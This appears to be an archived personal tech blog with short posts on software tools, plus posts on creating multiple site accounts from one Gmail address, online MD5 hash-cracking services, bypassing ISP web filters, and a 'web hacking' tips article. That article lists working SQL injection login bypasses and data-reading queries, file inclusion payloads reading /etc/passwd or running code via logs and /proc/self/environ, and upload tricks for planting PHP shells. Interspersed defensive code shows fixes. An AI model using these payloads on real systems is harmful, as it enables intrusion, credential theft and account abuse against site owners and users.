Thursday 10 February 2011

ieHTTPHeaders : An IE alternative for livehttpheaders add-on

Well, IE sucks, but if you still have to use it and want an HTTP header viewing add-on like LiveHTTPHeaders for Mozilla Firefox, there is a tool called ieHTTPHeaders that serves the same purpose.

I won't write much about it; just visit the official webpage for more information and download links:
Official webpage of ieHTTPheaders
Thanks.


Tuesday 8 February 2011

How to remove OS Boot Options from GRUB 2

Well, due to the number of updates, my Ubuntu installation was showing a number of OS boot options and I had to clean them up. With the new GRUB 2, removing the older kernel packages from Synaptic Package Manager is sufficient to remove these extra entries from GRUB. All you have to do is remove the kernel package and then update the GRUB configuration.

In my case, I'll be removing the kernel package version 2.6.35-23-generic, so I search for it in Synaptic Package Manager.

Now from the search result, I chose 2.6.35-23-generic, right-clicked and selected the Mark for Complete Removal option. Now we just need to apply the changes and wait a few minutes while everything is done. update-grub is run automatically, and in case it is not, you can run sudo update-grub from a terminal.

I hope this helps you. Enjoy :)


Bittorrent Client for mobiles [Symbian and Java]

We've been using tons of BitTorrent clients for P2P file sharing on our computers, but now we have such BitTorrent clients for mobile phones too. The Applied Mobile Research Group (AMORG) from Hungary has developed two BitTorrent clients that work on Symbian-based phones and Java-enabled phones.

SymTorrent is the first Symbian OS based BitTorrent client; it supports multiple torrent downloads with both download and upload, has every feature a basic torrent client should have, and works on Symbian OS 3rd and 5th edition. More information on SymTorrent is on the official webpage.




MobTorrent is the BitTorrent client for Java-powered phones, so you don't need to worry if you don't have an S60 phone.

Also, both of these tools are released under the GNU GPL license and hence are free and open source. Hope this is informative for you guys. :)


Sunday 6 February 2011

DoudouLinux - Linux designed for children

While browsing the internet, I came across this interesting Linux distribution and thought I'd share it here. It is a Linux distro called DoudouLinux and is targeted at children.

It is designed to be very simple and reliable for children to use, and provides applications suited to small children in the age range 2-12.
You can read more about it and get the download link from HERE.

DOWNLOAD PAGE for DoudouLinux


Multiple accounts with single email account in forums/facebook and other sites

Hi everybody, it's been a long time. I was on vacation and touring and was completely away from the internet for a while. I will now start to post more regularly. Anyway, in this post I will show you how you can make multiple accounts on different discussion forums, social networking sites and other sites (and maybe even on IRC and others) with a single email account. This trick requires a single Gmail account.

I accidentally typed an extra dot in my Gmail address while registering on one forum. But within about a minute, my Gmail tab was showing 1 new message in the inbox, and when I checked it, it was the forum's registration message. Then I tried to find out what was going on, and even a quick Google search revealed that this actually works.
So the idea is simply registering on your target site with multiple forms of your Gmail address, with the dot (.) in different positions. This Google answer explains it: the account coolsamar207@gmail.com would be equivalent to:
cool.samar207@gmail.com
or
coolsamar.207@gmail.com
or
coOlsamar2.07@gmail.com
etc.

This means you can register on forums/sites with any of the above (and many more) Gmail addresses and the email confirmation will still arrive in your Gmail inbox. I mean each account on the site would actually be associated with the single Gmail account.

I tested this with fluxbb and facebook and it was working well. I guess it would work for other social networking sites like MySpace, Twitter, etc. This might come in handy for many of you guys for different purposes. If you have any queries, feel free to ask here.
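From the site operator's side, the defence against this trick is to compare registrations on a canonical form of the address rather than on the raw string. The following is an added example, not code from the post: it strips dots from the local part of gmail.com addresses (and, going a little beyond the post, also drops a +tag suffix and folds the googlemail.com alias, both of which Gmail treats the same way), then uses that canonical form to find duplicate accounts in a constructed sample list of registrations.

```python
# Added example: canonicalize e-mail addresses so that the Gmail dot variants
# from the post all map to one identity. The registration list is constructed.

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}

REGISTRATIONS = [  # constructed sample of a forum's user table
    "cool.samar207@gmail.com",
    "coolsamar.207@gmail.com",
    "coOlsamar2.07@gmail.com",
    "john.doe@example.org",
    "jane@example.org",
]


def normalize_email(address):
    """Return the canonical form used for duplicate detection.

    For Gmail: lower-case, drop every dot in the local part, drop any +tag,
    and fold googlemail.com into gmail.com. Other domains are only
    lower-cased, because dots are significant there.
    """
    address = address.strip()
    local, sep, domain = address.rpartition("@")
    if not sep:
        return address.lower()          # not an address; nothing to fold
    local, domain = local.lower(), domain.lower()
    if domain in GMAIL_DOMAINS:
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return local + "@" + domain


def find_duplicates(addresses):
    """Group addresses by canonical form; return only groups with >1 member."""
    groups = {}
    for raw in addresses:
        groups.setdefault(normalize_email(raw), []).append(raw)
    return {canon: raws for canon, raws in groups.items() if len(raws) > 1}


if __name__ == "__main__":
    for canon, raws in find_duplicates(REGISTRATIONS).items():
        print(canon, "<-", ", ".join(raws))
```

Run on the constructed list, the three dotted variants of coolsamar207 collapse to one canonical address while the example.org accounts stay distinct. A registration handler would apply normalize_email before the uniqueness check and store the canonical form alongside the address the user typed.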


Friday 7 January 2011

List of online MD5 [+ other] hash crackers

Here is a list of some online MD5 hash cracking services you might find useful. Some of them also offer cracking of other hashes like SHA1, LM, MySQL, etc.

HashKiller.com, My personal favorite
Md5decrypter.co.uk, Another service I try
md5.rednoize.com
md5cracker.com, performs lookup in different online hash crackers
Passcracking.com
cmd5.org
Plain-Text.info
lmcrack.com
HashCrack.com

There are other online MD5 crackers, but these should be enough to crack the hashes; if they can't, it is unlikely that any other online cracker (except the dedicated and paid ones) would. I hope this helps you.

EDIT: A few more online crackers added:
HashChecker.de
Md5This.com
TMTO.Org


Sunday 26 December 2010

Bypass web filters of Nepali ISPs

Well okay, I am here to rescue you if you are facing the problem of the website you want to visit being blocked by the ISPs. After the NTA sent letters to the ISPs in Nepal to block sites with some potentially bad content, ISPs have started filtering and blocking websites. In this post, I am going to show you how to bypass the web filters being applied by the ISPs. I've tested with the WebSurfer ISP, but you might still find one of these ways working for you.

Method #1:
So I assume you are searching for some stuff on a torrent site, and let's say your search query goes into the URL.
For example, if I search for sex comedy movie on torrentz.eu, the search query results in a URL like:
http://torrentz.eu/search?f=sex+comedy+movie

Unfortunately, WebSurfer blocks the keyword sex in the URL query, so we get a page like the one below:


Now let's change our query by searching with the upper-case version of sex, i.e. SEX, to bypass this filtering. The new URL after entering the search keywords would be:

http://torrentz.eu/search?f=SEX+comedy+movie

And this time you get the valid webpage with your expected search results. Wasn't it easy to bypass this lame blocking?
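The filter in Method #1 fails because it compares the raw URL against its keyword list without normalizing case or percent-encoding first. That is a general weakness of any keyword-based control (URL filters, WAF rules, the SQL keyword filters discussed later on this blog), so the following added example, which is not code from the post, puts the weak check beside a version that decodes and lower-cases the path and query values and matches whole words. The blocklist and URLs are constructed for the demonstration.

```python
# Added example: a case-sensitive raw-string keyword filter (the behaviour the
# post observes) next to one that normalizes the URL before matching.
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

BLOCKED_TERMS = {"sex"}   # constructed blocklist for the example


def weak_filter(url):
    """Case-sensitive substring match on the raw URL.

    Defeated by changing case ('SEX') or by percent-encoding any letter.
    """
    return any(term in url for term in BLOCKED_TERMS)


def normalized_filter(url):
    """Decode the path and every query value, lower-case them, then match
    whole words, so 'SEX' and '%53ex' are caught but 'essex' is not."""
    parts = urlsplit(url)
    pieces = [unquote_plus(parts.path)]
    pieces += [value for _, value in parse_qsl(parts.query, keep_blank_values=True)]
    text = " ".join(pieces).lower()
    words = set(re.split(r"[^a-z0-9]+", text)) - {""}
    return bool(words & BLOCKED_TERMS)


if __name__ == "__main__":
    for url in ("http://torrentz.eu/search?f=sex+comedy+movie",
                "http://torrentz.eu/search?f=SEX+comedy+movie",
                "http://torrentz.eu/search?f=%53ex+comedy+movie",
                "http://torrentz.eu/search?f=essex+history"):
        print(url, "weak:", weak_filter(url), "normalized:", normalized_filter(url))
```

The upper-case and percent-encoded queries slip past weak_filter and are caught by normalized_filter, while the whole-word match stops the normalized version from over-blocking words that merely contain the term.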
Method #2:
I was checking the list of websites being blocked by Nepali ISPs and my eye caught utube.com, so I tried opening it. But it was another blocked site.
Check the screenshot below:



This time I am using the Internet Protocol address (the IP address of the website) to visit the website. To find the IP of any website, you can simply run:

ping utube.com

This will give you the IP of the website. For utube.com, the associated IP was 67.192.184.210, so now in your browser type the address of the website as http://67.192.184.210 and that will bypass the block and open the website.



Method #3:
Using a proxy
While this tends to be slow for me, you can use freely available proxies to bypass the web filters. I will leave this technique for you to do on your own, as there are hundreds of tutorials on how to use proxies. Anyway, I leave you with the site called Samair.ru, which lists tons of proxies you can use.

Also, you might try installing the TOR software on your system (works pretty well for me).


Method #4:
Another way is to use alternative DNS servers, which will work perfectly if the ISP is blocking websites based on DNS resolution. You can use the DNS servers from OpenDNS or Google, or you may google for other free DNS servers. Be sure to choose a good DNS server while doing so. The good thing about OpenDNS is that it also provides anti-phishing protection that your ISP might not be providing.

Google's DNS IPs: 8.8.8.8 and 8.8.4.4
OpenDNS IPs: 208.67.220.220 and 208.67.222.222

You can then set up the DNS servers either in your router or on your PC, as required.

Method #5 and more:
I will update this post as I test more things. I haven't tested with VPNs, Google cache, translators, etc. These days, ISPs are also blocking websites by combining the methods discussed above, further aided by deep packet inspection.

I hope this helps some of you out there. Thanks.


Web Hacking for Beginners and Intermediates

This is the article I posted for the secworm contest, and I am now posting it on my blog. It's not that well written due to lack of time, but it will still help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as my entry for the secworm contest #1. First, I would like to apologize for any grammar mistakes in this article, as there are surely lots of grammatical errors in it.

This article is not about teaching the basics of any web hacking technique. Instead, it is a collection of tips and tricks that beginners and intermediates can make use of to attack web applications in certain scenarios. I assume that you know the basics of web hacking techniques, or you could google to learn the basics. I'll be covering tricks for different web hacking methods such as SQL injection (basically MySQL), insecure file inclusion, insecure file upload, etc. As already stated, the article won't be about basics but rather presents a few tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: -- (followed by a space), /* ... */, #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 -- hex literal instead of a quoted string
SELECT pass FROM users WHERE user=char(115,97,109,50,48,55) -- char() with the decimal character codes of sam207

Load local file: SELECT LOAD_FILE('/etc/passwd') -- quote bypassing (hex or char() for the path) works here too.

Create file with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
Quote bypassing does not seem to work here: the path must be a literal quoted string and can't be written with hex or char(), so we can't bypass the quote in this case.

Using LIMIT: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one result is displayed at a time while doing SQLi; step the offset to walk through the rows)

unhex(hex()): union all select 1,unhex(hex(concat(username,0x3a,password))) from tblusers-- (hex() takes a single argument, so wrap the whole concat())

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),(table_name)from(information_schema.tables)) -- bypassing a whitespace filter with parentheses
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,'<script>alert(123)</script>' (the markup must be a string literal; use its hex form if quotes are filtered)

Login bypass:
'=' in both the username and password fields
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
Entered in the username field with a random password, these bypass a vulnerable login form.

' /*or*/ 1='1 -- bypasses a filter on the keyword or
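All of the login bypass strings above depend on one thing: the username being pasted into the query text. As an added example (not code from the article), here is that vulnerable pattern beside the parameterized form, using Python's built-in sqlite3 so it runs offline; the users table and its one account are constructed. The demo uses the ' or 1=1-- variant rather than ' or 1='1'-- because SQLite, unlike MySQL, does not treat the comparison 1='1' as true.

```python
# Added example: string-built login query (vulnerable) vs. parameterized query.
# Uses an in-memory SQLite database with a constructed users table.
import sqlite3


def make_db():
    """Constructed sample database with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('sam207', 's3cret')")
    return conn


def login_vulnerable(conn, user, password):
    """Builds the SQL by string formatting: whatever the user types becomes
    part of the statement, so a quote ends the literal and -- discards the
    password check."""
    sql = "SELECT user FROM users WHERE user='%s' AND pass='%s'" % (user, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    """Same query with placeholders: the driver sends the values separately,
    so a quote or comment sequence in the input is just data."""
    sql = "SELECT user FROM users WHERE user=? AND pass=?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


def demo():
    """Return the outcome of a real login and of the bypass against both forms."""
    conn = make_db()
    payload = "' or 1=1--"
    return {
        "real/vulnerable": login_vulnerable(conn, "sam207", "s3cret"),
        "real/safe": login_safe(conn, "sam207", "s3cret"),
        "bypass/vulnerable": login_vulnerable(conn, payload, "anything"),
        "bypass/safe": login_safe(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result)
```

The vulnerable function logs the attacker in as the first row of the table without a password; the parameterized one returns no row for the same input. The comment-style bypasses (/*, #, ;) in the list above behave the same way against the string-built query, and are equally inert against the placeholder version.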


File Inclusion:
-> A sample vulnerable piece of code (test.php) would be something like the one below:


Including a file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

Path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Null byte injection (the null byte is URL-encoded as %00 and truncates whatever the script appends after the parameter)
test.php?page=../../../../../etc/passwd%00

Directory listing with null byte injection, only on FreeBSD (afaik) and with magic quotes off
test.php?page=../../../../home/%00

PHP stream wrapper inclusion (returns the source base64-encoded instead of executing it)
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
More details on this: http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also, you should try including everything you can, such as session files, uploaded files, etc. For Apache log injection, you'll have to telnet to the server and send a GET request containing arbitrary PHP code, like Get / A few Apache log locations to try are as below:

User-Agent
test.php?page=../../../../../../../proc/self/environ
Set your User-Agent to some PHP code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of a folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically path traversal: if the guessed folder exists, the path resolves and /etc/passwd is included; if it doesn't, the include fails, so the response tells you whether the folder is there.

File upload:
Null byte injection: if only valid extensions (such as jpg, gif) are allowed, we can rename our shell to shell.php%00.jpg, which bypasses the file upload extension check.

PHP code within an image: sometimes uploads are not checked for the file extension but for the dimensions of the image. This again can be bypassed by injecting PHP code into a valid image and renaming it to a .php file. The tool named edjpgcom can be used to inject the PHP code as a JPEG comment in the image.

Header bypass: again, sometimes the developer just relies on the header information that declares the type of the file, like "image/jpeg" for a JPEG image. But since this is sent from the client side, it can be modified with tools such as Tamper Data or Live HTTP Headers.

Also, the file upload feature can be exploited in combination with a file inclusion vulnerability. If you have a site vulnerable to file inclusion but not to insecure file upload, you can upload a valid image as described in the second method here and then include that file with the file-inclusion-vulnerable PHP script.
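The three upload bypasses above each target one weak check: a name-only extension test, a dimensions test that never looks at the bytes, and trust in the client's Content-Type. The following added example (not code from the article) is an upload validator that rejects null bytes in the name, takes the extension only from the final component, checks the file's magic bytes against that extension, refuses image data carrying a PHP open tag, and stores the file under a server-chosen random name. The sample files and the allowlist are constructed.

```python
# Added example: server-side upload validation that never trusts the client's
# filename tricks or Content-Type. Sample files below are constructed.
import os
import secrets

# Magic bytes for the image types the form accepts (constructed allowlist).
IMAGE_MAGIC = {
    ".jpg":  b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif":  b"GIF8",
    ".png":  b"\x89PNG\r\n\x1a\n",
}

# Constructed samples: a minimal JPEG header, and the same header followed by a
# COM (0xFFFE) comment segment carrying a PHP tag, as edjpgcom would produce.
GOOD_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 16
COMMENT_JPEG = b"\xff\xd8\xff\xfe\x00\x16<?php echo 'hi'; ?>" + b"\x00" * 8


def validate_upload(filename, content_type, data):
    """Return (accepted, reason). content_type is client-supplied and is only
    echoed back for logging; every decision is made from filename and data."""
    if "\x00" in filename:
        return False, "null byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()    # last extension only
    if ext not in IMAGE_MAGIC:
        return False, "extension %r not allowed" % ext
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "content is not a %s image (client said %s)" % (ext, content_type)
    if b"<?" in data:
        return False, "script marker inside image data"
    return True, "accepted as %s" % ext


def storage_name(filename):
    """Server-chosen name: random stem plus the validated extension, so the
    uploader never controls what the file is called on disk."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    cases = [
        ("photo.jpg", "image/jpeg", GOOD_JPEG),
        ("shell.php", "image/jpeg", GOOD_JPEG),
        ("shell.php\x00.jpg", "image/jpeg", b"<?php echo 'hi'; ?>"),
        ("shell.php.jpg", "image/jpeg", b"<?php echo 'hi'; ?>"),
        ("photo.jpg", "image/jpeg", COMMENT_JPEG),
    ]
    for name, ctype, data in cases:
        print(repr(name), "->", validate_upload(name, ctype, data))
```

The b"<?" scan is a cheap heuristic that can false-positive on arbitrary binary data; the robust fix for the JPEG-comment case is to re-encode the image with an imaging library so that foreign segments are dropped. Independently of validation, the upload directory should not be one where the web server executes PHP, which is what neutralizes the upload-plus-inclusion combination described above.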

As said earlier, this article is not about giving you every step of how to exploit web vulnerabilities.


